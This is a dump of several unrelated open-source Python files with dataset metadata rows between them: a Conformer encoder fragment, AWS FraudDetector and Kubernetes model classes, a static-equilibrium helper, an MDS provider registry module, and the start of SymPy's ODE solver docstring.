dropout_rate=dropout,
max_len=pos_emb_max_len,
xscale=self.xscale,
dropout_rate_emb=dropout_emb,
)
elif self_attention_model == "abs_pos":
pos_bias_u = None
pos_bias_v = None
self.pos_enc = PositionalEncoding(
d_model=d_model, dropout_rate=dropout, max_len=pos_emb_max_len, xscale=self.xscale
)
else:
raise ValueError(f"Not valid self_attention_model: '{self_attention_model}'!")
self.layers = nn.ModuleList()
for i in range(n_layers):
layer = ConformerLayer(
d_model=d_model,
d_ff=d_ff,
self_attention_model=self_attention_model,
n_heads=n_heads,
conv_kernel_size=conv_kernel_size,
dropout=dropout,
dropout_att=dropout_att,
pos_bias_u=pos_bias_u,
pos_bias_v=pos_bias_v,
)
self.layers.append(layer)
if feat_out > 0 and feat_out != self.output_dim:
self.out_proj = nn.Linear(self.feat_out, feat_out)
self._feat_out = feat_out
else:
self.out_proj = None
self._feat_out = d_model
@typecheck()
def forward(self, audio_signal, length=None):
if length is None:
length = torch.tensor(audio_signal.size(-1)).repeat(audio_signal.size(0)).to(audio_signal)
audio_signal = torch.transpose(audio_signal, 1, 2)
if isinstance(self.pre_encode, ConvSubsampling):
audio_signal, length = self.pre_encode(audio_signal, length)
else:
audio_signal = self.embed(audio_signal)
audio_signal, pos_emb = self.pos_enc(audio_signal)
bs, xmax, idim = audio_signal.size()
# Create the self-attention and padding masks
pad_mask = self.make_pad_mask(length, max_time=xmax, device=audio_signal.device)
att_mask = pad_mask.unsqueeze(1).repeat([1, xmax, 1])
att_mask = att_mask & att_mask.transpose(1, 2)
if self.att_context_size[0] >= 0:
att_mask = att_mask.triu(diagonal=-self.att_context_size[0])
if self.att_context_size[1] >= 0:
att_mask = att_mask.tril(diagonal=self.att_context_size[1])
att_mask = ~att_mask
pad_mask = ~pad_mask
for lth, layer in enumerate(self.layers):
audio_signal = layer(x=audio_signal, att_mask=att_mask, pos_emb=pos_emb, pad_mask=pad_mask)
if self.out_proj is not None:
audio_signal = self.out_proj(audio_signal)
audio_signal = torch.transpose(audio_signal, 1, 2)
return audio_signal, length
@staticmethod
def make_pad_mask(seq_lens, max_time, device=None):
"""Make masking for padding."""
bs = seq_lens.size(0)
seq_range = torch.arange(0, max_time, dtype=torch.int32)
seq_range_expand = seq_range.unsqueeze(0).expand(bs, max_time)
seq_lens = seq_lens.type(seq_range_expand.dtype).to(seq_range_expand.device)
seq_length_expand = seq_lens.unsqueeze(-1)
mask = seq_range_expand < seq_length_expand
if device:
mask = mask.to(device)
return mask
| 38.625
| 107
| 0.63218
|
bb1152506c891b434268f050de6322a772d56712
| 3,324
|
py
|
Python
|
troposphere/frauddetector.py
|
pierretr/troposphere
|
1bd6a010a3132aa3436ffe6b892f352876face4b
|
[
"BSD-2-Clause"
] | 4,573
|
2015-01-02T20:31:04.000Z
|
2022-03-31T17:15:32.000Z
|
troposphere/frauddetector.py
|
pierretr/troposphere
|
1bd6a010a3132aa3436ffe6b892f352876face4b
|
[
"BSD-2-Clause"
] | 1,730
|
2015-01-02T19:24:47.000Z
|
2022-03-31T23:22:52.000Z
|
troposphere/frauddetector.py
|
pierretr/troposphere
|
1bd6a010a3132aa3436ffe6b892f352876face4b
|
[
"BSD-2-Clause"
] | 1,753
|
2015-01-01T01:24:12.000Z
|
2022-03-27T05:36:17.000Z
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 39.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import boolean
class EntityType(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class EventVariable(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"DataSource": (str, False),
"DataType": (str, False),
"DefaultValue": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
"VariableType": (str, False),
}
class Label(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class EventType(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"EntityTypes": ([EntityType], False),
"EventVariables": ([EventVariable], False),
"Inline": (boolean, False),
"Labels": ([Label], False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class Model(AWSProperty):
props = {
"Arn": (str, False),
}
class Outcome(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class Rule(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"DetectorId": (str, False),
"Expression": (str, False),
"Language": (str, False),
"LastUpdatedTime": (str, False),
"Outcomes": ([Outcome], False),
"RuleId": (str, False),
"RuleVersion": (str, False),
"Tags": (Tags, False),
}
class Detector(AWSObject):
resource_type = "AWS::FraudDetector::Detector"
props = {
"AssociatedModels": ([Model], False),
"Description": (str, False),
"DetectorId": (str, True),
"DetectorVersionStatus": (str, False),
"EventType": (EventType, True),
"RuleExecutionMode": (str, False),
"Rules": ([Rule], True),
"Tags": (Tags, False),
}
class Variable(AWSObject):
resource_type = "AWS::FraudDetector::Variable"
props = {
"DataSource": (str, True),
"DataType": (str, True),
"DefaultValue": (str, True),
"Description": (str, False),
"Name": (str, True),
"Tags": (Tags, False),
"VariableType": (str, False),
}
| 25.181818
| 52
| 0.529483
|
875a975855ead45fe0e94fa9e0990fe0ef22e926
| 6,326
|
py
|
Python
|
kubernetes/client/models/v1_node_list.py
|
iguazio/python
|
c2684bb479d44a49a2010ec4ede5ffa7b17349dd
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_node_list.py
|
iguazio/python
|
c2684bb479d44a49a2010ec4ede5ffa7b17349dd
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_node_list.py
|
iguazio/python
|
c2684bb479d44a49a2010ec4ede5ffa7b17349dd
|
[
"Apache-2.0"
] | 1
|
2019-01-10T11:13:52.000Z
|
2019-01-10T11:13:52.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1NodeList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'items': 'list[V1Node]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
"""
V1NodeList - a model defined in Swagger
"""
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""
Gets the api_version of this V1NodeList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1NodeList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1NodeList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1NodeList.
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""
Gets the items of this V1NodeList.
List of nodes
:return: The items of this V1NodeList.
:rtype: list[V1Node]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1NodeList.
List of nodes
:param items: The items of this V1NodeList.
:type: list[V1Node]
"""
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
"""
Gets the kind of this V1NodeList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1NodeList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1NodeList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1NodeList.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1NodeList.
Standard list metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The metadata of this V1NodeList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1NodeList.
Standard list metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param metadata: The metadata of this V1NodeList.
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1NodeList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.839623
| 281
| 0.594689
|
2ac3e7213fda0c3738565b8c92f155a8d809a1ae
| 2,378
|
py
|
Python
|
arithmetic_analysis/in_static_equilibrium.py
|
NISH1001/Python
|
7a9b3c7292cbd71fdc7723f449b9bbcbefbf9747
|
[
"MIT"
] | 6
|
2022-03-25T06:41:39.000Z
|
2022-03-28T17:26:42.000Z
|
arithmetic_analysis/in_static_equilibrium.py
|
NISH1001/Python
|
7a9b3c7292cbd71fdc7723f449b9bbcbefbf9747
|
[
"MIT"
] | 33
|
2022-02-19T19:41:47.000Z
|
2022-02-24T20:53:39.000Z
|
arithmetic_analysis/in_static_equilibrium.py
|
NISH1001/Python
|
7a9b3c7292cbd71fdc7723f449b9bbcbefbf9747
|
[
"MIT"
] | 3
|
2022-02-21T21:00:29.000Z
|
2022-02-24T13:48:21.000Z
|
"""
Checks if a system of forces is in static equilibrium.
"""
from __future__ import annotations
from numpy import array, cos, cross, ndarray, radians, sin
def polar_force(
magnitude: float, angle: float, radian_mode: bool = False
) -> list[float]:
"""
Resolves force along rectangular components.
(force, angle) => (force_x, force_y)
>>> polar_force(10, 45)
[7.071067811865477, 7.0710678118654755]
>>> polar_force(10, 3.14, radian_mode=True)
[-9.999987317275396, 0.01592652916486828]
"""
if radian_mode:
return [magnitude * cos(angle), magnitude * sin(angle)]
return [magnitude * cos(radians(angle)), magnitude * sin(radians(angle))]
def in_static_equilibrium(
forces: ndarray, location: ndarray, eps: float = 10**-1
) -> bool:
"""
Check if a system is in equilibrium.
It takes two numpy.array objects.
forces ==> [
[force1_x, force1_y],
[force2_x, force2_y],
....]
location ==> [
[x1, y1],
[x2, y2],
....]
>>> force = array([[1, 1], [-1, 2]])
>>> location = array([[1, 0], [10, 0]])
>>> in_static_equilibrium(force, location)
False
"""
# summation of moments is zero
moments: ndarray = cross(location, forces)
sum_moments: float = sum(moments)
return abs(sum_moments) < eps
if __name__ == "__main__":
# Test to check if it works
forces = array(
[polar_force(718.4, 180 - 30), polar_force(879.54, 45), polar_force(100, -90)]
)
location = array([[0, 0], [0, 0], [0, 0]])
assert in_static_equilibrium(forces, location)
# Problem 1 in image_data/2D_problems.jpg
forces = array(
[
polar_force(30 * 9.81, 15),
polar_force(215, 180 - 45),
polar_force(264, 90 - 30),
]
)
location = array([[0, 0], [0, 0], [0, 0]])
assert in_static_equilibrium(forces, location)
# Problem in image_data/2D_problems_1.jpg
forces = array([[0, -2000], [0, -1200], [0, 15600], [0, -12400]])
location = array([[0, 0], [6, 0], [10, 0], [12, 0]])
assert in_static_equilibrium(forces, location)
import doctest
doctest.testmod()
| 28.650602
| 87
| 0.549201
|
1f4948688b1ebb59a7eefb01f83d63c9f3d1ff74
| 58
|
py
|
Python
|
tests/source/test_18.py
|
DragosUnguru/PyPP-Byterun
|
2cbd7c875e7578e38706e48c2e38e0f5abfe6662
|
[
"MIT"
] | 1
|
2020-02-16T01:45:57.000Z
|
2020-02-16T01:45:57.000Z
|
tests/source/test_18.py
|
DragosUnguru/PyPP-Byterun
|
2cbd7c875e7578e38706e48c2e38e0f5abfe6662
|
[
"MIT"
] | null | null | null |
tests/source/test_18.py
|
DragosUnguru/PyPP-Byterun
|
2cbd7c875e7578e38706e48c2e38e0f5abfe6662
|
[
"MIT"
] | null | null | null |
def main():
a = 3
b = 10
c = a % b
c = 15
b = c % a
| 7.25
| 11
| 0.362069
|
4a2baa226668353cf0da570460bd3481f6306c5b
| 6,520
|
py
|
Python
|
mds/providers.py
|
hdemma/mds-provider
|
f50b79b686cbb4631e5d4b241a0fe1a6336d2f8d
|
[
"MIT"
] | 17
|
2018-09-21T00:46:09.000Z
|
2021-09-29T13:26:22.000Z
|
mds/providers.py
|
hdemma/mds-provider
|
f50b79b686cbb4631e5d4b241a0fe1a6336d2f8d
|
[
"MIT"
] | 56
|
2018-09-20T18:02:12.000Z
|
2020-05-21T07:41:28.000Z
|
mds/providers.py
|
hdemma/mds-provider
|
f50b79b686cbb4631e5d4b241a0fe1a6336d2f8d
|
[
"MIT"
] | 22
|
2018-09-20T23:53:26.000Z
|
2021-06-07T19:00:41.000Z
|
"""
Work with Providers from the registry.
"""
import csv
import pathlib
import uuid
import requests
import mds.github
from .schemas import STATUS_CHANGES, TRIPS, EVENTS, VEHICLES
from .versions import Version
class Provider():
"""
A simple model for an entry in a Provider registry.
"""
def __init__(self, identifier=None, ref=mds.github.MDS_DEFAULT_REF, path=None, **kwargs):
"""
Initialize a new Provider instance.
Parameters:
identifier: str, UUID, Provider, optional
The provider_id or provider_name from the registry.
ref: str, Version
The reference (git commit, branch, tag, or version) at which to query the registry.
path: str, Path, optional
A path to a local registry file.
provider_name: str, optional
The name of the provider from the registry.
provider_id: str, UUID
The unique identifier for the provider from the registry.
url: str
The provider's website url from the registry.
mds_api_url: str
The provider's base API url from the registry.
gbfs_api_url: str
The provider's GBFS API url from the registry.
Additional keyword parameters are set as attributes on the Provider instance.
"""
# parsing a Provider record
if not identifier:
self.provider_name = kwargs.pop("provider_name", None)
provider_id = kwargs.pop("provider_id", None)
self.provider_id = provider_id if isinstance(provider_id, uuid.UUID) else uuid.UUID(provider_id)
self.auth_type = kwargs.pop("auth_type", "Bearer")
self.gbfs_api_url = self._clean_url(kwargs.pop("gbfs_api_url", None))
self.headers = kwargs.pop("headers", {})
self.mds_api_suffix = kwargs.pop("mds_api_suffix", None)
self.mds_api_url = self._clean_url(kwargs.pop("mds_api_url", None))
self.registry_path = path
self.registry_ref = ref
self.url = self._clean_url(kwargs.pop("url", None))
try:
self.version = Version(ref)
except:
pass
for k,v in kwargs.items():
setattr(self, k, v)
# copy Provider instance
elif isinstance(identifier, Provider):
_kwargs = vars(identifier)
_kwargs.update(kwargs)
Provider.__init__(self, ref=identifier.registry_ref, path=identifier.registry_path, **_kwargs)
# interrogate the registry
else:
provider = Registry(ref=ref, path=path).find(identifier, **kwargs)
if provider:
Provider.__init__(self, provider)
def __repr__(self):
ref, name, pid, url = (
self.registry_ref or self.registry_path,
self.provider_name,
str(self.provider_id),
self.mds_api_url
)
return f"<mds.providers.Provider ('{ref}', '{name}', '{pid}', '{url}')>"
@property
def endpoints(self):
endpoint = [self.mds_api_url]
if self.mds_api_suffix:
endpoint.append(self.mds_api_suffix.rstrip("/"))
return {
STATUS_CHANGES: "/".join(endpoint + [STATUS_CHANGES]),
TRIPS: "/".join(endpoint + [TRIPS]),
EVENTS: "/".join(endpoint + [EVENTS]),
VEHICLES: "/".join(endpoint + [VEHICLES])
}
@staticmethod
def _clean_url(url):
"""
Helper to return a normalized URL
"""
if url:
url = url.lower().rstrip("/")
return url if url.startswith("https://") else f"https://{url}"
else:
return None
class Registry():
"""
Represents a local or remote Provider registry.
See: https://github.com/CityOfLosAngeles/mobility-data-specification/blob/master/providers.csv
"""
_registry = {}
def __init__(self, ref=mds.github.MDS_DEFAULT_REF, path=None, **kwargs):
"""
Parameters:
ref: str, Version
The reference (git commit, branch, tag, or version) at which to query the registry.
By default, download from GitHub master.
path: str, Path, optional
A path to a local registry file to skip the GitHub download.
"""
key = (str(ref), path)
if key not in self._registry:
self._registry[key] = self._get_registry(*key)
self.providers = self._registry[key]
self.ref = ref
self.path = path
def __repr__(self):
data = "'" + "', '".join([str(self.ref or self.path), str(len(self.providers)) + " providers"]) + "'"
return f"<mds.files.Registry ({data})>"
def find(self, provider, **kwargs):
"""
Find a Provider instance in this Registry.
Parameters:
provider: str, UUID
A provider_id or provider_name to look for in the registry.
Additional keyword arguments are set as attributes on the Provider instance.
Return:
Provider
The matching Provider instance, or None.
"""
try:
provider = uuid.UUID(provider)
except ValueError:
pass
# filter for matching provider(s)
found = next((p for p in self.providers if any([
isinstance(provider, str) and p.provider_name.lower() == provider.lower(),
isinstance(provider, uuid.UUID) and p.provider_id == provider
])), None)
# re-init with the record from registry and config
return Provider(found, **kwargs) if found else None
@staticmethod
def _get_registry(ref, path):
if path:
path = pathlib.Path(path)
with path.open("r") as f:
return Registry._parse_csv(f.readlines(), ref=ref, path=path)
else:
url = mds.github.registry_url(ref)
with requests.get(url, stream=True) as r:
lines = (line.decode("utf-8").replace(", ", ",") for line in r.iter_lines())
return Registry._parse_csv(lines, ref=ref, path=path)
@staticmethod
def _parse_csv(lines, **kwargs):
"""
Parse CSV lines into a list of Provider instances.
"""
return [Provider(**record, **kwargs) for record in csv.DictReader(lines)]
| 33.096447
| 109
| 0.578681
|
a2f1bd3eb2a46babe18ad78a473d78638f160382
| 277,100
|
py
|
Python
|
sympy/solvers/ode/ode.py
|
mijo2/sympy
|
8a6beee32556d42c6d0b1c1687681b3b2cfed9b9
|
[
"BSD-3-Clause"
] | 1
|
2020-12-26T05:30:08.000Z
|
2020-12-26T05:30:08.000Z
|
sympy/solvers/ode/ode.py
|
mijo2/sympy
|
8a6beee32556d42c6d0b1c1687681b3b2cfed9b9
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/solvers/ode/ode.py
|
mijo2/sympy
|
8a6beee32556d42c6d0b1c1687681b3b2cfed9b9
|
[
"BSD-3-Clause"
] | null | null | null |
r"""
This module contains :py:meth:`~sympy.solvers.ode.dsolve` and different helper
functions that it uses.
:py:meth:`~sympy.solvers.ode.dsolve` solves ordinary differential equations.
See the docstring on the various functions for their uses. Note that partial
differential equations support is in ``pde.py``. Note that hint functions
have docstrings describing their various methods, but they are intended for
internal use. Use ``dsolve(ode, func, hint=hint)`` to solve an ODE using a
specific hint. See also the docstring on
:py:meth:`~sympy.solvers.ode.dsolve`.
**Functions in this module**
These are the user functions in this module:
- :py:meth:`~sympy.solvers.ode.dsolve` - Solves ODEs.
- :py:meth:`~sympy.solvers.ode.classify_ode` - Classifies ODEs into
possible hints for :py:meth:`~sympy.solvers.ode.dsolve`.
- :py:meth:`~sympy.solvers.ode.checkodesol` - Checks if an equation is the
solution to an ODE.
- :py:meth:`~sympy.solvers.ode.homogeneous_order` - Returns the
homogeneous order of an expression.
- :py:meth:`~sympy.solvers.ode.infinitesimals` - Returns the infinitesimals
of the Lie group of point transformations of an ODE, such that it is
invariant.
- :py:meth:`~sympy.solvers.ode.checkinfsol` - Checks if the given infinitesimals
are the actual infinitesimals of a first order ODE.
These are the non-solver helper functions that are for internal use. The
user should use the various options to
:py:meth:`~sympy.solvers.ode.dsolve` to obtain the functionality provided
by these functions:
- :py:meth:`~sympy.solvers.ode.ode.odesimp` - Does all forms of ODE
simplification.
- :py:meth:`~sympy.solvers.ode.ode.ode_sol_simplicity` - A key function for
comparing solutions by simplicity.
- :py:meth:`~sympy.solvers.ode.constantsimp` - Simplifies arbitrary
constants.
- :py:meth:`~sympy.solvers.ode.ode.constant_renumber` - Renumber arbitrary
constants.
- :py:meth:`~sympy.solvers.ode.ode._handle_Integral` - Evaluate unevaluated
Integrals.
See also the docstrings of these functions.
**Currently implemented solver methods**
The following methods are implemented for solving ordinary differential
equations. See the docstrings of the various hint functions for more
information on each (run ``help(ode)``):
- 1st order separable differential equations.
- 1st order differential equations whose coefficients or `dx` and `dy` are
functions homogeneous of the same order.
- 1st order exact differential equations.
- 1st order linear differential equations.
- 1st order Bernoulli differential equations.
- Power series solutions for first order differential equations.
- Lie Group method of solving first order differential equations.
- 2nd order Liouville differential equations.
- Power series solutions for second order differential equations
at ordinary and regular singular points.
- `n`\th order differential equation that can be solved with algebraic
rearrangement and integration.
- `n`\th order linear homogeneous differential equation with constant
coefficients.
- `n`\th order linear inhomogeneous differential equation with constant
coefficients using the method of undetermined coefficients.
- `n`\th order linear inhomogeneous differential equation with constant
coefficients using the method of variation of parameters.
**Philosophy behind this module**
This module is designed to make it easy to add new ODE solving methods without
having to mess with the solving code for other methods. The idea is that
there is a :py:meth:`~sympy.solvers.ode.classify_ode` function, which takes in
an ODE and tells you what hints, if any, will solve the ODE. It does this
without attempting to solve the ODE, so it is fast. Each solving method is a
hint, and it has its own function, named ``ode_<hint>``. That function takes
in the ODE and any match expression gathered by
:py:meth:`~sympy.solvers.ode.classify_ode` and returns a solved result. If
this result has any integrals in it, the hint function will return an
unevaluated :py:class:`~sympy.integrals.integrals.Integral` class.
:py:meth:`~sympy.solvers.ode.dsolve`, which is the user wrapper function
around all of this, will then call :py:meth:`~sympy.solvers.ode.ode.odesimp` on
the result, which, among other things, will attempt to solve the equation for
the dependent variable (the function we are solving for), simplify the
arbitrary constants in the expression, and evaluate any integrals, if the hint
allows it.
**How to add new solution methods**
If you have an ODE that you want :py:meth:`~sympy.solvers.ode.dsolve` to be
able to solve, try to avoid adding special case code here. Instead, try
finding a general method that will solve your ODE, as well as others. This
way, the :py:mod:`~sympy.solvers.ode` module will become more robust, and
unhindered by special case hacks. WolphramAlpha and Maple's
DETools[odeadvisor] function are two resources you can use to classify a
specific ODE. It is also better for a method to work with an `n`\th order ODE
instead of only with specific orders, if possible.
To add a new method, there are a few things that you need to do. First, you
need a hint name for your method. Try to name your hint so that it is
unambiguous with all other methods, including ones that may not be implemented
yet. If your method uses integrals, also include a ``hint_Integral`` hint.
If there is more than one way to solve ODEs with your method, include a hint
for each one, as well as a ``<hint>_best`` hint. Your ``ode_<hint>_best()``
function should choose the best using min with ``ode_sol_simplicity`` as the
key argument. See
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best`, for example.
The function that uses your method will be called ``ode_<hint>()``, so the
hint must only use characters that are allowed in a Python function name
(alphanumeric characters and the underscore '``_``' character). Include a
function for every hint, except for ``_Integral`` hints
(:py:meth:`~sympy.solvers.ode.dsolve` takes care of those automatically).
Hint names should be all lowercase, unless a word is commonly capitalized
(such as Integral or Bernoulli). If you have a hint that you do not want to
run with ``all_Integral`` that doesn't have an ``_Integral`` counterpart (such
as a best hint that would defeat the purpose of ``all_Integral``), you will
need to remove it manually in the :py:meth:`~sympy.solvers.ode.dsolve` code.
See also the :py:meth:`~sympy.solvers.ode.classify_ode` docstring for
guidelines on writing a hint name.
Determine *in general* how the solutions returned by your method compare with
other methods that can potentially solve the same ODEs. Then, put your hints
in the :py:data:`~sympy.solvers.ode.allhints` tuple in the order that they
should be called. The ordering of this tuple determines which hints are
default. Note that exceptions are ok, because it is easy for the user to
choose individual hints with :py:meth:`~sympy.solvers.ode.dsolve`. In
general, ``_Integral`` variants should go at the end of the list, and
``_best`` variants should go before the various hints they apply to. For
example, the ``undetermined_coefficients`` hint comes before the
``variation_of_parameters`` hint because, even though variation of parameters
is more general than undetermined coefficients, undetermined coefficients
generally returns cleaner results for the ODEs that it can solve than
variation of parameters does, and it does not require integration, so it is
much faster.
Next, you need to have a match expression or a function that matches the type
of the ODE, which you should put in :py:meth:`~sympy.solvers.ode.classify_ode`
(if the match function is more than just a few lines, like
:py:meth:`~sympy.solvers.ode.ode._undetermined_coefficients_match`, it should go
outside of :py:meth:`~sympy.solvers.ode.classify_ode`). It should match the
ODE without solving for it as much as possible, so that
:py:meth:`~sympy.solvers.ode.classify_ode` remains fast and is not hindered by
bugs in solving code. Be sure to consider corner cases. For example, if your
solution method involves dividing by something, make sure you exclude the case
where that division will be 0.
In most cases, the matching of the ODE will also give you the various parts
that you need to solve it. You should put that in a dictionary (``.match()``
will do this for you), and add that as ``matching_hints['hint'] = matchdict``
in the relevant part of :py:meth:`~sympy.solvers.ode.classify_ode`.
:py:meth:`~sympy.solvers.ode.classify_ode` will then send this to
:py:meth:`~sympy.solvers.ode.dsolve`, which will send it to your function as
the ``match`` argument. Your function should be named ``ode_<hint>(eq, func,
order, match)`. If you need to send more information, put it in the ``match``
dictionary. For example, if you had to substitute in a dummy variable in
:py:meth:`~sympy.solvers.ode.classify_ode` to match the ODE, you will need to
pass it to your function using the `match` dict to access it. You can access
the independent variable using ``func.args[0]``, and the dependent variable
(the function you are trying to solve for) as ``func.func``. If, while trying
to solve the ODE, you find that you cannot, raise ``NotImplementedError``.
:py:meth:`~sympy.solvers.ode.dsolve` will catch this error with the ``all``
meta-hint, rather than causing the whole routine to fail.
Add a docstring to your function that describes the method employed. Like
with anything else in SymPy, you will need to add a doctest to the docstring,
in addition to real tests in ``test_ode.py``. Try to maintain consistency
with the other hint functions' docstrings. Add your method to the list at the
top of this docstring. Also, add your method to ``ode.rst`` in the
``docs/src`` directory, so that the Sphinx docs will pull its docstring into
the main SymPy documentation. Be sure to make the Sphinx documentation by
running ``make html`` from within the doc directory to verify that the
docstring formats correctly.
If your solution method involves integrating, use :py:obj:`~.Integral` instead of
:py:meth:`~sympy.core.expr.Expr.integrate`. This allows the user to bypass
hard/slow integration by using the ``_Integral`` variant of your hint. In
most cases, calling :py:meth:`sympy.core.basic.Basic.doit` will integrate your
solution. If this is not the case, you will need to write special code in
:py:meth:`~sympy.solvers.ode.ode._handle_Integral`. Arbitrary constants should be
symbols named ``C1``, ``C2``, and so on. All solution methods should return
an equality instance. If you need an arbitrary number of arbitrary constants,
you can use ``constants = numbered_symbols(prefix='C', cls=Symbol, start=1)``.
If it is possible to solve for the dependent function in a general way, do so.
Otherwise, do as best as you can, but do not call solve in your
``ode_<hint>()`` function. :py:meth:`~sympy.solvers.ode.ode.odesimp` will attempt
to solve the solution for you, so you do not need to do that. Lastly, if your
ODE has a common simplification that can be applied to your solutions, you can
add a special case in :py:meth:`~sympy.solvers.ode.ode.odesimp` for it. For
example, solutions returned from the ``1st_homogeneous_coeff`` hints often
have many :obj:`~sympy.functions.elementary.exponential.log` terms, so
:py:meth:`~sympy.solvers.ode.ode.odesimp` calls
:py:meth:`~sympy.simplify.simplify.logcombine` on them (it also helps to write
the arbitrary constant as ``log(C1)`` instead of ``C1`` in this case). Also
consider common ways that you can rearrange your solution to have
:py:meth:`~sympy.solvers.ode.constantsimp` take better advantage of it. It is
better to put simplification in :py:meth:`~sympy.solvers.ode.ode.odesimp` than in
your method, because it can then be turned off with the simplify flag in
:py:meth:`~sympy.solvers.ode.dsolve`. If you have any extraneous
simplification in your function, be sure to only run it using ``if
match.get('simplify', True):``, especially if it can be slow or if it can
reduce the domain of the solution.
Finally, as with every contribution to SymPy, your method will need to be
tested. Add a test for each method in ``test_ode.py``. Follow the
conventions there, i.e., test the solver using ``dsolve(eq, f(x),
hint=your_hint)``, and also test the solution using
:py:meth:`~sympy.solvers.ode.checkodesol` (you can put these in a separate
tests and skip/XFAIL if it runs too slow/doesn't work). Be sure to call your
hint specifically in :py:meth:`~sympy.solvers.ode.dsolve`, that way the test
won't be broken simply by the introduction of another matching hint. If your
method works for higher order (>1) ODEs, you will need to run ``sol =
constant_renumber(sol, 'C', 1, order)`` for each solution, where ``order`` is
the order of the ODE. This is because ``constant_renumber`` renumbers the
arbitrary constants by printing order, which is platform dependent. Try to
test every corner case of your solver, including a range of orders if it is a
`n`\th order solver, but if your solver is slow, such as if it involves hard
integration, try to keep the test run time down.
Feel free to refactor existing hints to avoid duplicating code or creating
inconsistencies. If you can show that your method exactly duplicates an
existing method, including in the simplicity and speed of obtaining the
solutions, then you can remove the old, less general method. The existing
code is tested extensively in ``test_ode.py``, so if anything is broken, one
of those tests will surely fail.
"""
from __future__ import print_function, division
from collections import defaultdict
from itertools import islice
from sympy.functions import hyper
from sympy.core import Add, S, Mul, Pow, oo, Rational
from sympy.core.compatibility import ordered, iterable
from sympy.core.containers import Tuple
from sympy.core.exprtools import factor_terms
from sympy.core.expr import AtomicExpr, Expr
from sympy.core.function import (Function, Derivative, AppliedUndef, diff,
expand, expand_mul, Subs, _mexpand)
from sympy.core.multidimensional import vectorize
from sympy.core.numbers import NaN, zoo, Number
